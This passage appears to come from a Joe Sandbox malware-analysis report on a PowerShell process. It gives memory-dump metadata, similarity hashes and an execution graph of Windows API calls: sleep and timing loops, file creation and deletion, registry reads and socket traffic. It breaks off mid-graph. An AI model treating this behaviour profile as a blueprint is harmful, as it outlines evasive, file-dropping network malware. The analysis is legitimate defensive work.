                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1526263719.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff7c0230000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                          • Instruction ID: d258c2ad631cbf920bad819d45ea1e1b7f7fff3d8cc9a28bd553953fd2110aba
                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                          • Instruction Fuzzy Hash: 5901677151CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3651D736E882CB45

                                                          Execution Graph

                                                          Execution Coverage:13%
                                                          Dynamic/Decrypted Code Coverage:99.6%
                                                          Signature Coverage:11.9%
                                                          Total number of Nodes:948
                                                          Total number of Limit Nodes:23
                                                          execution_graph 3488 32ac6da 3489 32ac6ec CreateThread 3488->3489 3492 32ad1c1 3489->3492 3524 32ad1f8 3489->3524 3493 32ada9f CloseHandle 3492->3493 3494 32adb12 3492->3494 3502 32adb1b 3492->3502 3495 32adac7 3493->3495 3510 32adba0 3494->3510 3495->3492 3497 32adb8d CreateThread 3499 32adbee CreateThread 3497->3499 3523 32adc4d 3497->3523 3501 32ae6c4 3499->3501 3522 32ae6f2 3499->3522 3503 32adb2b 3502->3503 3504 32adba0 2 API calls 3503->3504 3505 32adb8d CreateThread 3504->3505 3507 32adbee CreateThread 3505->3507 3518 32adc4d 3505->3518 3509 32ae6c4 3507->3509 3516 32ae6f2 3507->3516 3511 32adbca CreateThread 3510->3511 3512 32adbc5 3510->3512 3513 32adbee CreateThread 3511->3513 3521 32adc4d 3511->3521 3512->3511 3515 32ae6c4 3513->3515 3520 32ae6f2 3513->3520 3517 32ae6f7 3516->3517 3519 32adc52 3518->3519 3525 32ad1fd 3524->3525 3526 329e328 3527 329e345 timeGetTime 3526->3527 3529 329e5b3 SleepEx 3527->3529 3531 329e682 3529->3531 3532 329eedb 3534 329eee0 3532->3534 3536 329eef2 3534->3536 3537 329efc0 SleepEx 3536->3537 3540 329efd1 timeGetTime 3536->3540 3539 329f335 3537->3539 3541 329f036 SleepEx 3540->3541 3543 329f335 3541->3543 3544 2f5cb30 3545 2f5cb39 WaitForSingleObject 3544->3545 3546 2f5cb56 SHGetKnownFolderPath 3545->3546 3547 2f5ccb2 3545->3547 3548 2f5cb75 LocalAlloc 3546->3548 3549 2f5ccad 3546->3549 3550 2f5cb96 3548->3550 3551 2f5cca2 CoTaskMemFree 3548->3551 3549->3545 3561 2f79e0c 3550->3561 3551->3549 3553 2f5cbbd CreateFileW 3554 2f5cc05 3553->3554 3555 2f5cc97 LocalFree 3554->3555 3556 2f5cc8c CloseHandle 3554->3556 3557 2f5cc21 CloseHandle LocalFree CoTaskMemFree OpenEventW 3554->3557 3572 2f65700 3554->3572 3555->3551 3556->3555 3558 2f5cc82 3557->3558 3559 2f5cc6c SetEvent CloseHandle 3557->3559 3558->3547 3559->3558 3562 2f79e3e _FF_MSGBANNER 3561->3562 3563 2f79e43 3562->3563 3565 2f79e65 3562->3565 3597 2f7c2d0 3563->3597 3600 2f7b57c 3565->3600 3567 2f79e9f 3568 2f79e48 _invalid_parameter_noinfo 3567->3568 3569 2f79eab 3567->3569 3615 2f7b2c4 3567->3615 3568->3553 3569->3568 3571 2f7b2c4 write_char 7 API calls 3569->3571 3571->3568 4142 2f62830 3572->4142 3575 2f65731 CreateDirectoryW 3576 2f65754 LocalAlloc 3575->3576 3578 2f65743 _getptd 3575->3578 3579 2f65775 3576->3579 3580 2f658ca 3576->3580 3577 2f658dd 3577->3554 3578->3576 3578->3580 3581 2f79e0c 9 API calls 3579->3581 3580->3577 3582 2f658d2 LocalFree 3580->3582 3583 2f6579c CreateFileW GetLastError 3581->3583 3582->3577 3584 2f657eb 3583->3584 3585 2f658b7 3584->3585 3586 2f657fd 3584->3586 4153 2f5bfb0 3584->4153 3585->3580 3587 2f658bf LocalFree 3585->3587 3588 2f65871 LocalFree LocalFree 3586->3588 3587->3580 3588->3577 3591 2f65830 WriteFile 3595 2f6588e LocalFree 3591->3595 3596 2f6585d CloseHandle 3591->3596 3592 2f65899 3593 2f658a1 CloseHandle 3592->3593 3594 2f658ac DeleteFileW 3592->3594 3593->3594 3594->3585 3595->3592 3596->3588 3636 2f7c574 3597->3636 3599 2f7c2d9 3599->3568 3662 2f7ad7c 3600->3662 3603 2f7c2d0 _errno 4 API calls 3613 2f7b5f0 _amsg_exit _FF_MSGBANNER 3603->3613 3604 2f7b5fc 3605 2f7c2d0 _errno 4 API calls 3604->3605 3606 2f7b601 _invalid_parameter_noinfo _FF_MSGBANNER 3605->3606 3606->3567 3607 2f7b454 7 API calls write_char 3607->3613 3609 2f7de60 __free_lconv_num 4 API calls 3609->3613 3610 2f820d0 7 API calls 3610->3613 3611 2f7b48c 7 API calls write_multi_char 3611->3613 3612 2f7b4e0 7 API calls 3612->3613 3613->3604 3613->3606 3613->3607 3613->3609 3613->3610 3613->3611 3613->3612 3670 2f82250 3613->3670 3673 2f81f2c 3613->3673 4029 2f81ccc 3615->4029 3617 2f7b2e6 3618 2f7b2f1 3617->3618 3619 2f7b308 3617->3619 3620 2f7c2d0 _errno 4 API calls 3618->3620 3621 2f7b30d 3619->3621 3626 2f7b31a write_char 3619->3626 3634 2f7b2f6 3620->3634 3622 2f7c2d0 _errno 4 API calls 3621->3622 3622->3634 3623 2f7b37f 3624 2f7b38c 3623->3624 3625 2f7b419 3623->3625 3627 2f7b3c1 3624->3627 3628 2f7b3a8 3624->3628 3629 2f81924 write_char 6 API calls 3625->3629 3626->3623 3632 2f7b373 3626->3632 3626->3634 4033 2f81a58 3626->4033 3627->3634 4062 2f810e0 3627->4062 4042 2f81924 3628->4042 3629->3634 3632->3623 4039 2f81a04 3632->4039 3634->3569 3637 2f7c583 _getptd 3636->3637 3638 2f7c5e2 SetLastError 3637->3638 3646 2f81fac 3637->3646 3638->3599 3640 2f7c5a7 _getptd 3640->3638 3641 2f7c5c5 _getptd 3640->3641 3642 2f7c5db 3640->3642 3644 2f7c5cc GetCurrentThreadId 3641->3644 3650 2f7de60 3642->3650 3644->3638 3645 2f7c5e0 3645->3638 3649 2f81fd1 _getbuf 3646->3649 3648 2f82011 3648->3640 3649->3648 3655 2f8464c 3649->3655 3651 2f7de65 HeapFree 3650->3651 3652 2f7de85 _getptd __free_lconv_num 3650->3652 3651->3652 3653 2f7de80 3651->3653 3652->3645 3654 2f7c2d0 _errno 3 API calls 3653->3654 3654->3652 3656 2f84661 3655->3656 3661 2f8467e malloc 3655->3661 3657 2f8466f 3656->3657 3656->3661 3659 2f7c2d0 _errno 3 API calls 3657->3659 3658 2f84696 RtlAllocateHeap 3660 2f84674 3658->3660 3658->3661 3659->3660 3660->3649 3661->3658 3661->3660 3663 2f7ad8e 3662->3663 3666 2f7adef 3662->3666 3677 2f7c5f8 3663->3677 3666->3603 3667 2f7adc8 3667->3666 3692 2f7f3a4 3667->3692 3671 2f7ad7c write_char 5 API calls 3670->3671 3672 2f82262 3671->3672 3672->3613 3676 2f81f54 _getbuf 3673->3676 3675 2f81f8c 3675->3613 3676->3675 4017 2f7e008 3676->4017 3678 2f7c574 _getptd 4 API calls 3677->3678 3679 2f7c603 3678->3679 3680 2f7ad93 3679->3680 3699 2f801c8 3679->3699 3680->3667 3682 2f7fc74 3680->3682 3683 2f7c5f8 _getptd 5 API calls 3682->3683 3684 2f7fc7f 3683->3684 3685 2f7fca8 3684->3685 3686 2f7fc9a 3684->3686 3771 2f7fc1c 3685->3771 3687 2f7c5f8 _getptd 5 API calls 3686->3687 3689 2f7fc9f 3687->3689 3690 2f7fce0 3689->3690 3691 2f801c8 _amsg_exit 5 API calls 3689->3691 3690->3667 3691->3690 3693 2f7c5f8 _getptd 5 API calls 3692->3693 3697 2f7f3b3 3693->3697 3694 2f7f450 3694->3666 3695 2f7f3ce 3695->3694 3696 2f801c8 _amsg_exit 5 API calls 3695->3696 3696->3694 3697->3695 3698 2f7de60 __free_lconv_num 4 API calls 3697->3698 3698->3695 3706 2f8047c 3699->3706 3703 2f801dc 3733 2f80000 3703->3733 3739 2f83f28 3706->3739 3708 2f8048a 3709 2f80499 3708->3709 3711 2f83f28 _set_error_mode 4 API calls 3708->3711 3710 2f8021c _FF_MSGBANNER 4 API calls 3709->3710 3714 2f801d5 3709->3714 3712 2f804b0 3710->3712 3711->3709 3713 2f8021c _FF_MSGBANNER 4 API calls 3712->3713 3713->3714 3715 2f8021c 3714->3715 3716 2f80250 _FF_MSGBANNER 3715->3716 3717 2f83f28 _set_error_mode 4 API calls 3716->3717 3731 2f803a2 _FF_MSGBANNER 3716->3731 3718 2f80266 3717->3718 3719 2f83f28 _set_error_mode 4 API calls 3718->3719 3718->3731 3720 2f80277 3719->3720 3720->3731 3743 2f83ebc 3720->3743 3722 2f802b3 _FF_MSGBANNER 3723 2f83ebc _FF_MSGBANNER 4 API calls 3722->3723 3724 2f802f4 _FF_MSGBANNER 3722->3724 3722->3731 3723->3724 3725 2f8034c _FF_MSGBANNER 3724->3725 3750 2f83dec 3724->3750 3757 2f83d64 3725->3757 3727 2f80377 3729 2f83d64 _FF_MSGBANNER 4 API calls 3727->3729 3727->3731 3730 2f80389 3729->3730 3730->3731 3764 2f83b5c 3730->3764 3731->3703 3738 2f8002e _amsg_exit 3733->3738 3734 2f80177 3735 2f80116 _amsg_exit _initterm 3735->3734 3736 2f8016d ExitProcess 3735->3736 3736->3734 3737 2f7c488 GetCurrentThreadId SetLastError HeapFree RtlAllocateHeap _amsg_exit 3737->3738 3738->3735 3738->3737 3740 2f83f30 3739->3740 3741 2f7c2d0 _errno 4 API calls 3740->3741 3742 2f83f3a _invalid_parameter_noinfo 3740->3742 3741->3742 3742->3708 3744 2f83ed7 3743->3744 3745 2f83ecd 3743->3745 3746 2f7c2d0 _errno 4 API calls 3744->3746 3745->3744 3747 2f83ef4 3745->3747 3749 2f83ee0 _invalid_parameter_noinfo 3746->3749 3748 2f7c2d0 _errno 4 API calls 3747->3748 3747->3749 3748->3749 3749->3722 3754 2f83dfc 3750->3754 3751 2f83e01 3752 2f83e06 _invalid_parameter_noinfo 3751->3752 3753 2f7c2d0 _errno 4 API calls 3751->3753 3752->3725 3753->3752 3754->3751 3754->3752 3755 2f83e3f 3754->3755 3755->3752 3756 2f7c2d0 _errno 4 API calls 3755->3756 3756->3752 3758 2f83d7f 3757->3758 3760 2f83d75 3757->3760 3759 2f7c2d0 _errno 4 API calls 3758->3759 3761 2f83d88 _invalid_parameter_noinfo 3759->3761 3760->3758 3762 2f83db6 3760->3762 3761->3727 3762->3761 3763 2f7c2d0 _errno 4 API calls 3762->3763 3763->3761 3767 2f7c488 3764->3767 3766 2f83b88 _amsg_exit _FF_MSGBANNER 3766->3731 3768 2f7c490 _amsg_exit 3767->3768 3769 2f823ba _amsg_exit 3768->3769 3770 2f7de60 __free_lconv_num 4 API calls 3768->3770 3769->3766 3770->3768 3772 2f7fc66 3771->3772 3773 2f7fc2a write_char _getptd 3771->3773 3772->3689 3773->3772 3775 2f7faa0 3773->3775 3776 2f7fb37 3775->3776 3778 2f7fabe 3775->3778 3777 2f7fb8a 3776->3777 3779 2f7de60 __free_lconv_num 4 API calls 3776->3779 3796 2f7fbb7 3777->3796 3843 2f831d8 3777->3843 3778->3776 3781 2f7fafd 3778->3781 3789 2f7de60 __free_lconv_num 4 API calls 3778->3789 3782 2f7fb5b 3779->3782 3785 2f7fb1f 3781->3785 3795 2f7de60 __free_lconv_num 4 API calls 3781->3795 3784 2f7de60 __free_lconv_num 4 API calls 3782->3784 3790 2f7fb6f 3784->3790 3787 2f7de60 __free_lconv_num 4 API calls 3785->3787 3786 2f7fc02 3791 2f7fb2b 3787->3791 3788 2f7de60 __free_lconv_num 4 API calls 3788->3796 3792 2f7faf1 3789->3792 3794 2f7de60 __free_lconv_num 4 API calls 3790->3794 3797 2f7de60 __free_lconv_num 4 API calls 3791->3797 3803 2f83634 3792->3803 3793 2f7de60 GetCurrentThreadId SetLastError HeapFree RtlAllocateHeap __free_lconv_num 3793->3796 3799 2f7fb7e 3794->3799 3800 2f7fb13 3795->3800 3796->3786 3796->3793 3797->3776 3802 2f7de60 __free_lconv_num 4 API calls 3799->3802 3831 2f835c8 3800->3831 3802->3777 3804 2f8363d 3803->3804 3829 2f83738 3803->3829 3805 2f7de60 __free_lconv_num 4 API calls 3804->3805 3806 2f83657 3804->3806 3805->3806 3807 2f7de60 __free_lconv_num 4 API calls 3806->3807 3809 2f83669 3806->3809 3807->3809 3808 2f8367b 3811 2f8368d 3808->3811 3812 2f7de60 __free_lconv_num 4 API calls 3808->3812 3809->3808 3810 2f7de60 __free_lconv_num 4 API calls 3809->3810 3810->3808 3813 2f8369f 3811->3813 3815 2f7de60 __free_lconv_num 4 API calls 3811->3815 3812->3811 3814 2f836b1 3813->3814 3816 2f7de60 __free_lconv_num 4 API calls 3813->3816 3817 2f836c3 3814->3817 3818 2f7de60 __free_lconv_num 4 API calls 3814->3818 3815->3813 3816->3814 3819 2f836d5 3817->3819 3820 2f7de60 __free_lconv_num 4 API calls 3817->3820 3818->3817 3821 2f836e7 3819->3821 3822 2f7de60 __free_lconv_num 4 API calls 3819->3822 3820->3819 3823 2f836f9 3821->3823 3825 2f7de60 __free_lconv_num 4 API calls 3821->3825 3822->3821 3824 2f8370e 3823->3824 3826 2f7de60 __free_lconv_num 4 API calls 3823->3826 3827 2f83723 3824->3827 3828 2f7de60 __free_lconv_num 4 API calls 3824->3828 3825->3823 3826->3824 3827->3829 3830 2f7de60 __free_lconv_num 4 API calls 3827->3830 3828->3827 3829->3781 3830->3829 3832 2f835cd 3831->3832 3841 2f8362e 3831->3841 3833 2f835e6 3832->3833 3834 2f7de60 __free_lconv_num 4 API calls 3832->3834 3835 2f835f8 3833->3835 3837 2f7de60 __free_lconv_num 4 API calls 3833->3837 3834->3833 3836 2f8360a 3835->3836 3838 2f7de60 __free_lconv_num 4 API calls 3835->3838 3839 2f7de60 __free_lconv_num 4 API calls 3836->3839 3840 2f8361c 3836->3840 3837->3835 3838->3836 3839->3840 3840->3841 3842 2f7de60 __free_lconv_num 4 API calls 3840->3842 3841->3785 3842->3841 3844 2f831e1 3843->3844 4016 2f7fbab 3843->4016 3845 2f7de60 __free_lconv_num 4 API calls 3844->3845 3846 2f831f2 3845->3846 3847 2f7de60 __free_lconv_num 4 API calls 3846->3847 3848 2f831fb 3847->3848 3849 2f7de60 __free_lconv_num 4 API calls 3848->3849 3850 2f83204 3849->3850 3851 2f7de60 __free_lconv_num 4 API calls 3850->3851 3852 2f8320d 3851->3852 3853 2f7de60 __free_lconv_num 4 API calls 3852->3853 3854 2f83216 3853->3854 3855 2f7de60 __free_lconv_num 4 API calls 3854->3855 3856 2f8321f 3855->3856 3857 2f7de60 __free_lconv_num 4 API calls 3856->3857 3858 2f83227 3857->3858 3859 2f7de60 __free_lconv_num 4 API calls 3858->3859 3860 2f83230 3859->3860 3861 2f7de60 __free_lconv_num 4 API calls 3860->3861 3862 2f83239 3861->3862 3863 2f7de60 __free_lconv_num 4 API calls 3862->3863 3864 2f83242 3863->3864 3865 2f7de60 __free_lconv_num 4 API calls 3864->3865 3866 2f8324b 3865->3866 3867 2f7de60 __free_lconv_num 4 API calls 3866->3867 3868 2f83254 3867->3868 3869 2f7de60 __free_lconv_num 4 API calls 3868->3869 3870 2f8325d 3869->3870 3871 2f7de60 __free_lconv_num 4 API calls 3870->3871 3872 2f83266 3871->3872 3873 2f7de60 __free_lconv_num 4 API calls 3872->3873 3874 2f8326f 3873->3874 3875 2f7de60 __free_lconv_num 4 API calls 3874->3875 3876 2f83278 3875->3876 3877 2f7de60 __free_lconv_num 4 API calls 3876->3877 3878 2f83284 3877->3878 3879 2f7de60 __free_lconv_num 4 API calls 3878->3879 3880 2f83290 3879->3880 3881 2f7de60 __free_lconv_num 4 API calls 3880->3881 3882 2f8329c 3881->3882 3883 2f7de60 __free_lconv_num 4 API calls 3882->3883 3884 2f832a8 3883->3884 3885 2f7de60 __free_lconv_num 4 API calls 3884->3885 3886 2f832b4 3885->3886 3887 2f7de60 __free_lconv_num 4 API calls 3886->3887 3888 2f832c0 3887->3888 3889 2f7de60 __free_lconv_num 4 API calls 3888->3889 3890 2f832cc 3889->3890 3891 2f7de60 __free_lconv_num 4 API calls 3890->3891 3892 2f832d8 3891->3892 3893 2f7de60 __free_lconv_num 4 API calls 3892->3893 3894 2f832e4 3893->3894 3895 2f7de60 __free_lconv_num 4 API calls 3894->3895 3896 2f832f0 3895->3896 3897 2f7de60 __free_lconv_num 4 API calls 3896->3897 3898 2f832fc 3897->3898 3899 2f7de60 __free_lconv_num 4 API calls 3898->3899 3900 2f83308 3899->3900 3901 2f7de60 __free_lconv_num 4 API calls 3900->3901 3902 2f83314 3901->3902 3903 2f7de60 __free_lconv_num 4 API calls 3902->3903 3904 2f83320 3903->3904 3905 2f7de60 __free_lconv_num 4 API calls 3904->3905 3906 2f8332c 3905->3906 3907 2f7de60 __free_lconv_num 4 API calls 3906->3907 3908 2f83338 3907->3908 3909 2f7de60 __free_lconv_num 4 API calls 3908->3909 3910 2f83344 3909->3910 3911 2f7de60 __free_lconv_num 4 API calls 3910->3911 3912 2f83350 3911->3912 3913 2f7de60 __free_lconv_num 4 API calls 3912->3913 3914 2f8335c 3913->3914 3915 2f7de60 __free_lconv_num 4 API calls 3914->3915 3916 2f83368 3915->3916 3917 2f7de60 __free_lconv_num 4 API calls 3916->3917 3918 2f83374 3917->3918 3919 2f7de60 __free_lconv_num 4 API calls 3918->3919 3920 2f83380 3919->3920 3921 2f7de60 __free_lconv_num 4 API calls 3920->3921 3922 2f8338c 3921->3922 3923 2f7de60 __free_lconv_num 4 API calls 3922->3923 3924 2f83398 3923->3924 3925 2f7de60 __free_lconv_num 4 API calls 3924->3925 3926 2f833a4 3925->3926 3927 2f7de60 __free_lconv_num 4 API calls 3926->3927 3928 2f833b0 3927->3928 3929 2f7de60 __free_lconv_num 4 API calls 3928->3929 3930 2f833bc 3929->3930 3931 2f7de60 __free_lconv_num 4 API calls 3930->3931 3932 2f833c8 3931->3932 3933 2f7de60 __free_lconv_num 4 API calls 3932->3933 3934 2f833d4 3933->3934 3935 2f7de60 __free_lconv_num 4 API calls 3934->3935 3936 2f833e0 3935->3936 3937 2f7de60 __free_lconv_num 4 API calls 3936->3937 3938 2f833ec 3937->3938 3939 2f7de60 __free_lconv_num 4 API calls 3938->3939 3940 2f833f8 3939->3940 3941 2f7de60 __free_lconv_num 4 API calls 3940->3941 3942 2f83404 3941->3942 3943 2f7de60 __free_lconv_num 4 API calls 3942->3943 3944 2f83410 3943->3944 3945 2f7de60 __free_lconv_num 4 API calls 3944->3945 3946 2f8341c 3945->3946 3947 2f7de60 __free_lconv_num 4 API calls 3946->3947 3948 2f83428 3947->3948 3949 2f7de60 __free_lconv_num 4 API calls 3948->3949 3950 2f83434 3949->3950 3951 2f7de60 __free_lconv_num 4 API calls 3950->3951 3952 2f83440 3951->3952 3953 2f7de60 __free_lconv_num 4 API calls 3952->3953 3954 2f8344c 3953->3954 3955 2f7de60 __free_lconv_num 4 API calls 3954->3955 3956 2f83458 3955->3956 3957 2f7de60 __free_lconv_num 4 API calls 3956->3957 3958 2f83464 3957->3958 3959 2f7de60 __free_lconv_num 4 API calls 3958->3959 3960 2f83470 3959->3960 3961 2f7de60 __free_lconv_num 4 API calls 3960->3961 3962 2f8347c 3961->3962 3963 2f7de60 __free_lconv_num 4 API calls 3962->3963 3964 2f83488 3963->3964 3965 2f7de60 __free_lconv_num 4 API calls 3964->3965 3966 2f83494 3965->3966 3967 2f7de60 __free_lconv_num 4 API calls 3966->3967 3968 2f834a0 3967->3968 3969 2f7de60 __free_lconv_num 4 API calls 3968->3969 3970 2f834ac 3969->3970 3971 2f7de60 __free_lconv_num 4 API calls 3970->3971 3972 2f834b8 3971->3972 3973 2f7de60 __free_lconv_num 4 API calls 3972->3973 3974 2f834c4 3973->3974 3975 2f7de60 __free_lconv_num 4 API calls 3974->3975 3976 2f834d0 3975->3976 3977 2f7de60 __free_lconv_num 4 API calls 3976->3977 3978 2f834dc 3977->3978 3979 2f7de60 __free_lconv_num 4 API calls 3978->3979 3980 2f834e8 3979->3980 3981 2f7de60 __free_lconv_num 4 API calls 3980->3981 3982 2f834f4 3981->3982 3983 2f7de60 __free_lconv_num 4 API calls 3982->3983 3984 2f83500 3983->3984 3985 2f7de60 __free_lconv_num 4 API calls 3984->3985 3986 2f8350c 3985->3986 3987 2f7de60 __free_lconv_num 4 API calls 3986->3987 3988 2f83518 3987->3988 3989 2f7de60 __free_lconv_num 4 API calls 3988->3989 3990 2f83524 3989->3990 3991 2f7de60 __free_lconv_num 4 API calls 3990->3991 3992 2f83530 3991->3992 3993 2f7de60 __free_lconv_num 4 API calls 3992->3993 3994 2f8353c 3993->3994 3995 2f7de60 __free_lconv_num 4 API calls 3994->3995 3996 2f83548 3995->3996 3997 2f7de60 __free_lconv_num 4 API calls 3996->3997 3998 2f83554 3997->3998 3999 2f7de60 __free_lconv_num 4 API calls 3998->3999 4000 2f83560 3999->4000 4001 2f7de60 __free_lconv_num 4 API calls 4000->4001 4002 2f8356c 4001->4002 4003 2f7de60 __free_lconv_num 4 API calls 4002->4003 4004 2f83578 4003->4004 4005 2f7de60 __free_lconv_num 4 API calls 4004->4005 4006 2f83584 4005->4006 4007 2f7de60 __free_lconv_num 4 API calls 4006->4007 4008 2f83590 4007->4008 4009 2f7de60 __free_lconv_num 4 API calls 4008->4009 4010 2f8359c 4009->4010 4011 2f7de60 __free_lconv_num 4 API calls 4010->4011 4012 2f835a8 4011->4012 4013 2f7de60 __free_lconv_num 4 API calls 4012->4013 4014 2f835b4 4013->4014 4015 2f7de60 __free_lconv_num 4 API calls 4014->4015 4015->4016 4016->3788 4018 2f7e09c malloc 4017->4018 4027 2f7e020 malloc 4017->4027 4020 2f7c2d0 _errno 4 API calls 4018->4020 4019 2f7e058 RtlAllocateHeap 4021 2f7e091 4019->4021 4019->4027 4020->4021 4021->3676 4022 2f8047c _FF_MSGBANNER 4 API calls 4022->4027 4023 2f7e081 4024 2f7c2d0 _errno 4 API calls 4023->4024 4026 2f7e086 4024->4026 4025 2f8021c _FF_MSGBANNER 4 API calls 4025->4027 4028 2f7c2d0 _errno 4 API calls 4026->4028 4027->4019 4027->4022 4027->4023 4027->4025 4027->4026 4028->4021 4030 2f81cda _invalid_parameter_noinfo 4029->4030 4031 2f81cd5 4029->4031 4030->3617 4032 2f7c2d0 _errno 4 API calls 4031->4032 4032->4030 4034 2f81a6e 4033->4034 4035 2f81a61 4033->4035 4037 2f7c2d0 _errno 4 API calls 4034->4037 4038 2f81a66 _invalid_parameter_noinfo 4034->4038 4036 2f7c2d0 _errno 4 API calls 4035->4036 4036->4038 4037->4038 4038->3632 4040 2f81f2c _getbuf 5 API calls 4039->4040 4041 2f81a1d 4040->4041 4041->3623 4043 2f81947 4042->4043 4046 2f8195f 4042->4046 4082 2f7c2f0 4043->4082 4044 2f819d6 4047 2f7c2f0 __doserrno 4 API calls 4044->4047 4046->4044 4049 2f81991 4046->4049 4050 2f819db 4047->4050 4085 2f84118 4049->4085 4053 2f7c2d0 _errno 4 API calls 4050->4053 4051 2f7c2d0 _errno 4 API calls 4059 2f81954 _invalid_parameter_noinfo 4051->4059 4053->4059 4055 2f819a4 4089 2f811c4 4055->4089 4056 2f819b5 4058 2f7c2d0 _errno 4 API calls 4056->4058 4060 2f819ba 4058->4060 4059->3634 4061 2f7c2f0 __doserrno 4 API calls 4060->4061 4061->4059 4063 2f8111b 4062->4063 4064 2f81103 4062->4064 4065 2f81195 4063->4065 4069 2f8114d 4063->4069 4066 2f7c2f0 __doserrno 4 API calls 4064->4066 4067 2f7c2f0 __doserrno 4 API calls 4065->4067 4068 2f81108 4066->4068 4070 2f8119a 4067->4070 4071 2f7c2d0 _errno 4 API calls 4068->4071 4072 2f84118 write_char RtlEnterCriticalSection 4069->4072 4073 2f7c2d0 _errno 4 API calls 4070->4073 4075 2f81110 _invalid_parameter_noinfo 4071->4075 4074 2f81154 4072->4074 4073->4075 4076 2f81160 4074->4076 4077 2f81172 4074->4077 4075->3634 4078 2f81048 write_char 4 API calls 4076->4078 4079 2f7c2d0 _errno 4 API calls 4077->4079 4078->4075 4080 2f81177 4079->4080 4081 2f7c2f0 __doserrno 4 API calls 4080->4081 4081->4075 4083 2f7c574 _getptd 4 API calls 4082->4083 4084 2f7c2f9 4083->4084 4084->4051 4086 2f84159 write_char 4085->4086 4087 2f81998 4086->4087 4088 2f84191 RtlEnterCriticalSection 4086->4088 4087->4055 4087->4056 4088->4087 4090 2f811e6 write_char 4089->4090 4091 2f8121a 4090->4091 4094 2f81280 4090->4094 4108 2f8120e _invalid_parameter_noinfo _FF_MSGBANNER 4090->4108 4092 2f7c2f0 __doserrno 4 API calls 4091->4092 4093 2f8121f 4092->4093 4095 2f7c2d0 _errno 4 API calls 4093->4095 4096 2f81295 4094->4096 4116 2f81048 4094->4116 4095->4108 4098 2f81a58 _isatty 4 API calls 4096->4098 4099 2f8129c 4098->4099 4100 2f7c5f8 _getptd 5 API calls 4099->4100 4113 2f8152e write_char _getptd _FF_MSGBANNER 4099->4113 4114 2f812c0 write_char _FF_MSGBANNER 4100->4114 4101 2f818b9 4102 2f7c2d0 _errno 4 API calls 4101->4102 4101->4108 4103 2f818e1 4102->4103 4105 2f7c2f0 __doserrno 4 API calls 4103->4105 4104 2f8185d 4106 2f818ad 4104->4106 4107 2f81862 4104->4107 4105->4108 4127 2f7c310 4106->4127 4109 2f7c2d0 _errno 4 API calls 4107->4109 4108->4059 4111 2f81867 4109->4111 4112 2f7c2f0 __doserrno 4 API calls 4111->4112 4112->4108 4113->4101 4113->4104 4113->4108 4114->4113 4124 2f82298 4114->4124 4132 2f840a4 4116->4132 4118 2f81064 4119 2f8106a 4118->4119 4120 2f8107b write_char _getptd 4118->4120 4121 2f7c2d0 _errno 4 API calls 4119->4121 4122 2f8106f 4120->4122 4123 2f7c310 write_char 4 API calls 4120->4123 4121->4122 4122->4096 4123->4122 4125 2f7ad7c write_char 5 API calls 4124->4125 4126 2f822ac 4125->4126 4126->4114 4128 2f7c574 _getptd 4 API calls 4127->4128 4129 2f7c31d 4128->4129 4130 2f7c574 _getptd 4 API calls 4129->4130 4131 2f7c336 __free_lconv_num 4130->4131 4131->4108 4133 2f840ad 4132->4133 4134 2f840c2 4132->4134 4135 2f7c2f0 __doserrno 4 API calls 4133->4135 4136 2f7c2f0 __doserrno 4 API calls 4134->4136 4141 2f840ba _invalid_parameter_noinfo 4134->4141 4137 2f840b2 4135->4137 4138 2f840fc 4136->4138 4139 2f7c2d0 _errno 4 API calls 4137->4139 4140 2f7c2d0 _errno 4 API calls 4138->4140 4139->4141 4140->4141 4141->4118 4160 2f62730 4142->4160 4145 2f6296d 4145->3575 4145->3577 4146 2f628b5 4147 2f628da LocalAlloc 4146->4147 4148 2f62962 CoTaskMemFree 4147->4148 4149 2f6290f 4147->4149 4148->4145 4150 2f79e0c 9 API calls 4149->4150 4151 2f6293b 4150->4151 4152 2f62945 CoTaskMemFree 4151->4152 4152->4145 4154 2f79e0c 9 API calls 4153->4154 4155 2f5bfe8 RegGetValueW 4154->4155 4156 2f5c046 LocalAlloc 4155->4156 4157 2f5c0ae 4155->4157 4156->4157 4158 2f5c064 RegGetValueW 4156->4158 4157->3591 4157->3592 4158->4157 4159 2f5c0c3 LocalFree 4158->4159 4159->4157 4161 2f62746 SHGetKnownFolderPath 4160->4161 4161->4145 4161->4146 4528 329da8f 4530 329da94 4528->4530 4532 329daa2 4530->4532 4531 329df08 SleepEx 4533 329df67 4531->4533 4532->4531 4162 2f77d00 4184 2f77d61 4162->4184 4163 2f7850f WaitForSingleObject 4167 2f77e12 4163->4167 4163->4184 4164 2f77dac WaitForSingleObject 4164->4163 4164->4184 4165 2f78172 WaitForMultipleObjects 4165->4167 4165->4184 4166 2f77dfb WaitForSingleObject 4166->4167 4166->4184 4168 2f78700 4167->4168 4170 2f78679 shutdown closesocket 4167->4170 4174 2f786d1 CloseHandle 4167->4174 4171 2f7870b shutdown closesocket 4168->4171 4172 2f78738 LocalFree 4168->4172 4169 2f78609 shutdown closesocket 4169->4184 4170->4167 4171->4172 4173 2f78577 shutdown closesocket 4173->4184 4174->4167 4175 2f785cf CloseHandle 4175->4184 4176 2f77e3c WaitForSingleObject 4176->4184 4178 2f7820a WaitForSingleObject 4178->4167 4179 2f78228 WaitForSingleObject 4178->4179 4181 2f7824b WSAEnumNetworkEvents 4179->4181 4179->4184 4180 2f77ec7 setsockopt 4182 2f77f12 setsockopt 4180->4182 4183 2f7813c shutdown closesocket 4180->4183 4181->4184 4185 2f78496 shutdown closesocket CloseHandle 4181->4185 4182->4183 4182->4184 4183->4184 4184->4163 4184->4164 4184->4165 4184->4166 4184->4167 4184->4169 4184->4173 4184->4175 4184->4176 4184->4178 4184->4180 4184->4183 4186 2f76620 10 API calls 4184->4186 4187 2f7828f shutdown closesocket CloseHandle 4184->4187 4188 2f78315 recv 4184->4188 4194 2f760d0 10 API calls 4184->4194 4195 2f780ac WSACreateEvent 4184->4195 4199 2f754d0 socket 4184->4199 4254 2f73ff0 4184->4254 4185->4184 4186->4184 4187->4184 4188->4184 4189 2f78425 shutdown closesocket CloseHandle 4188->4189 4189->4184 4192 2f783b4 shutdown closesocket 